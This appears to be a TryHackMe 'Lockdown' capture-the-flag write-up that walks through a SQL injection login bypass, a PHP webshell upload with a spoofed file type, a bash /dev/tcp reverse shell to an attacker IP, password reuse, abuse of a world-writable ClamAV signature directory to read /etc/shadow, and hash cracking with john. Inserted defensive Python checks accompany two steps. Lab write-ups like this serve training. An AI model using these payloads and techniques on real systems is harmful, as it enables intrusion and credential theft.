Lockdown - THM


Summary

We gain initial access by abusing a SQL injection vulnerability to bypass authentication and upload a PHP reverse shell. Enumerating the target locally, we discover that the cyrus user reuses a password stored in a config file, which gives us a shell as cyrus. Finally, privilege escalation is achieved by planting our own signature in clamscan's world-writable signature directory.


Exploitation

SQL Injection

Navigating to the admin page at http://contacttracer.thm/admin/login.php, we are prompted to log in.

We try some basic credentials (admin:admin, root:toor and admin:password), but none of them works, so we turn to SQL injection.

  • Payload: 1' or 1=1-- -, then Sign In.
[image: lockdown/1.png]

And we successfully bypassed the authentication prompt!

(More information about the vulnerability can be found here.)

After landing on the Admin Panel, we then navigate to the following URL: http://contacttracer.thm/admin/?page=system_info.

PHP Shell Upload

Now we prepare a cmback.php file with the following contents:

<?php system($_GET['cmd']); ?>

Once the file is ready, we upload it through the ?page=system_info form and click Update.

[image: lockdown/2.png]

Intercept the request with Burp and modify the file type as shown below.

[image: lockdown/3.png]

Then forward the request.

Once the file is successfully uploaded, we log out and go to http://contacttracer.thm/login.php.

Open the web developer tools (Ctrl + Shift + I), go to the Network tab, and we should see the location of the PHP file we uploaded.

[image: lockdown/4.png]

Let us try to trigger the shell with curl.

$ curl -s http://contacttracer.thm/uploads/1633297860_test.png.php\?cmd=whoami --output -
[PNG header bytes omitted]
www-data

and we have code execution!
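The upload succeeded because the server trusted the client-supplied Content-Type and judged the file by its first extension. The following added validator (not the ContactTracer application's code) ignores Content-Type entirely, checks the last extension against an allowlist, verifies magic bytes, and refuses embedded PHP tags; the sample bytes are constructed to mimic the 1633297860_test.png.php upload from this page.

```python
import os

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
# Leading bytes each allowed image type must start with.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def validate_upload(filename, content_type, data):
    """Return (ok, reason). The client's Content-Type is deliberately unused."""
    base = os.path.basename(filename)
    # Judge by the LAST extension: test.png.php is a .php file, not a .png.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXT:
        return False, f"extension '{ext}' is not an allowed image type"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match the declared image type"
    # Defence in depth: an image with PHP appended is still rejected.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag found in upload"
    return True, "ok"


# Constructed samples: a minimal PNG-looking blob and the same blob with a webshell appended.
PNG_SAMPLE = MAGIC["png"] + b"\x00" * 16
WEBSHELL = PNG_SAMPLE + b"<?php system($_GET['cmd']); ?>"

if __name__ == "__main__":
    print(validate_upload("1633297860_test.png.php", "image/png", WEBSHELL))
    print(validate_upload("test.png", "image/png", WEBSHELL))
    print(validate_upload("test.png", "image/png", PNG_SAMPLE))
```

Even with this check in place, uploads should be stored outside the web root or in a directory where the web server does not execute scripts.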

Now, it is easy to pull a bash reverse shell.

$ curl -s http://contacttracer.thm/uploads/1633297860_test.png.php\?cmd=bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.4.1.61%2F80+0%3E%261%22

$ nc -nlvp 80                     
listening on [any] 80 ...
connect to [10.4.1.61] from (UNKNOWN) [10.10.139.26] 54572
bash: cannot set terminal process group (1046): Inappropriate ioctl for device
bash: no job control in this shell
www-data@lockdown:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

Shell as cyrus

Enumerating the system reveals a plaintext password stored in a config file.

Trying that password against each system user, we find that sweetpandemonium lets us in as cyrus.

www-data@lockdown:/var/www/html/uploads$ su cyrus
Password: sweetpandemonium
cyrus@lockdown:~$ 

As cyrus, sudo -l shows that we may run the following command as root:

cyrus@lockdown:~$ sudo -l
[sudo] password for cyrus: 
Matching Defaults entries for cyrus on lockdown:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cyrus may run the following commands on lockdown:
    (root) /opt/scan/scan.sh

System compromised

Further enumeration reveals that the directory /var/lib/clamav/, where ClamAV loads its signatures from, is world-writable.

Our goal is to write a YARA rule that flags /etc/shadow as malicious, so that the scan script copies it into a quarantine directory that we can read.

To do that, we first prepare a .yara rule:

cyrus@lockdown:~$ cat /var/lib/clamav/root.yara 
rule root_txt
{
        strings:
                $a = "www-data:*:"
        condition:
                $a
}

The rule marks any file containing the string www-data:*: as malicious, which matches the locked www-data entry in /etc/shadow.

Once we trigger the scan with the sudo-allowed script …

cyrus@lockdown:~$ sudo /opt/scan/scan.sh                                                        
[sudo] password for cyrus: 
Enter path: /etc   
/etc/ld.so.cache: OK                        
/etc/manpath.config: OK
/etc/rsyslog.conf: OK
...
----------- SCAN SUMMARY -----------
Known viruses: 2
Engine version: 0.103.2
Scanned directories: 1
Scanned files: 83
Infected files: 4
Data scanned: 0.23 MB
Data read: 0.12 MB (ratio 1.97:1)
Time: 0.080 sec (0 m 0 s)
Start Date: 2021:10:04 01:04:25
End Date:   2021:10:04 01:04:25

the /etc/shadow file is copied to ~/quarantine/shadow.
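The root cause here is a root-run scanner loading signatures from a directory any user can write to. As an added defender-side check (not part of this writeup's tooling), the audit below flags a world-writable ClamAV database directory or signature files and lists custom YARA rules for review; the demo builds a constructed temporary directory that mimics the misconfiguration found on the box. Treating .yara/.yar as the custom-signature extensions is an assumption of this example.

```python
import os
import stat
import tempfile

CUSTOM_SIG_EXT = (".yara", ".yar")  # assumption: extensions of hand-written rules


def audit_signature_dir(path):
    """Return a list of (entry, problem) findings for a ClamAV database directory."""
    findings = []
    if os.stat(path).st_mode & stat.S_IWOTH:
        findings.append((path, "directory is world-writable"))
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if os.lstat(full).st_mode & stat.S_IWOTH:
            findings.append((full, "file is world-writable"))
        if name.lower().endswith(CUSTOM_SIG_EXT):
            findings.append((full, "custom YARA signature present; verify its provenance"))
    return findings


def demo():
    """Constructed example: a temp dir standing in for a misconfigured /var/lib/clamav."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "root.yara"), "w") as fh:
        fh.write('rule root_txt { strings: $a = "www-data:*:" condition: $a }\n')
    os.chmod(d, 0o777)                 # world-writable, as found on the box
    problems = audit_signature_dir(d)
    os.chmod(d, 0o755)                 # the corrected permission
    fixed = audit_signature_dir(d)
    return problems, fixed


if __name__ == "__main__":
    before, after = demo()
    for entry, problem in before:
        print("BEFORE:", entry, "-", problem)
    for entry, problem in after:
        print("AFTER: ", entry, "-", problem)
```

On a real host, run the audit against /var/lib/clamav and also check that any sudo-permitted scan script quarantines files into a root-only directory.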

Here is the content of the shadow file.

cyrus@lockdown:~$ cat quarantine/shadow
...
maxine:$6$/syu6s6/$Z5j6C61vrwzvXmFsvMRzwNYHO71NSQgm/z4cWQpDxMt3JEpT9FvnWm4Nuy.xE3xCQHzY3q9Q4lxXLJyR1mt320:18838:0:99999:7:::
...

We can crack the hash locally with unshadow and john:

$ unshadow maxine_passwd maxine_shadow > maxine_pass 
$ john --wordlist=/usr/share/wordlists/rockyou.txt maxine_pass
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tiarna           (maxine)
1g 0:00:00:17 DONE (2021-10-03 21:10) 0.05767g/s 4665p/s 4665c/s 4665C/s 070196..skyline123
Use the "--show" option to display all of the cracked passwords reliably
Session completed

With the cracked password, we can log in as maxine and run any sudo command as root!

cyrus@lockdown:~$ su maxine
Password: tiarna
maxine@lockdown:/home/cyrus$ sudo su -
root@lockdown:~# id
uid=0(root) gid=0(root) groups=0(root)